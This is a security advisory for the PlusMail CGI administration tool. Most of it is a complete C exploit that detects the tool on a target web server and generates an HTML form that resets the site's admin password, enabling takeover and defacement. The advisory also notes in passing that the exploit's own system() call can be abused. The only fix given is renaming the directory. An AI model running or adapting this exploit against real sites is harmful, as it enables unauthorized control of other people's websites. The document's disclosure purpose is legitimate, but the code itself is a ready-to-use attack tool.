COMMAND
PlusMail
SYSTEMS AFFECTED
PowerScripts PlusMail (All versions to current)
PROBLEM
YT Cracker found following (gH Security Advisory). Plusmail is
an extremely popular cgi-based administration tool that allows
you to take control of your website with a graphical control
panel interface. The password file, however, is set with
permissions rw enabled, therefore granting the authority to change
the password whenever's clever. The following code will detect
the vulnerability and generate the required html to exploit.
Noticed plusmail running on multiple operating systems. The
vulnerability lies in the web based tool, which now that is
easily exploited, gives you "ADVANCED CONTROL" of a target
website. Below is the code by ytcracker of gH, which
demonstrates how easy it is to generate the html code which is
executed by your web browser to compromise the target host. It
was noticed this PlusMail program is widely used, but have yet
to succeed in finding the main site for PlusMail to acknowledge
the developers of the remote vulnerability.
Most likely this will be ripped out during the online trading,
because of script kids not likely this factual addition, but never
the less, it will be expressed. This exploit was written to
acknowledge security weaknesses, but in no way promotes web page
defacments. If you further use this program to gain access to
anything not normally accessable by yourself, meaning you script
kids, then you are subject to be prosecuted and even get 10 years
in prison. Is it honestly worth it to compile this program and
randomly ./hack sites and deface them with this half way
automatted program to put your nick & group on it? The answer is
NO.
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <fcntl.h>
#include <strings.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <sys/socket.h>
int main(int argc, char *argv[])
{
int sock;
unsigned long vulnip;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
char *detect;
char buffer[1024];
char plusvuln[]="GET /cgi-bin/plusmail HTTP/1.0\n\n";
char htmI[]="<html><head><title>[gH plusmail exploit]</title></head><form action=\"http://";
char htmII[]="/cgi-bin/plusmail\" method=\"post\"><p>username: <input type=\"text\" name=\"username\"><br>password: <input type=\"password\" name=\"password\"><br>retype password: <input type=\"password\" name=\"password1\"></p><p><input type=\"submit\"
name=\"new_login\" value=\"reset password\"></p></form><p><a href=\"http://pure-security.net\">Pure Security Networks</a></p></body></html>";
FILE *html;
printf("\n [gH plusmail exploit] [ytcracker] [phed@felons.org]\n");
if(argc<2)
{
printf(" usage: %s [vulnerable website]\n\n",argv[0]);
exit(0);
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
vulnip=inet_addr(argv[1]);
vulnip=ntohl(vulnip);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
send(sock, plusvuln,strlen(plusvuln),0);
recv(sock, buffer, sizeof(buffer),0);
detect = strstr(buffer,"404");
close(sock);
if( detect != NULL)
{
printf(" vulnerabilty not detected.\n");
exit(0);
}
else
printf(" vulnerability detected. generating html...\n");
html=fopen("plus.html","w+b");
fprintf(html,"%s",htmI);
fprintf(html,"%s",argv[1]);
fprintf(html,"%s",htmII);
fclose(html);
printf(" spawning lynx...\n");
system("lynx plus.html");
return 0;
}
The system() calls will allow you to exploit the exploit execv()>*
SOLUTION
Move/rename the PlusMail directory as a temporary fix.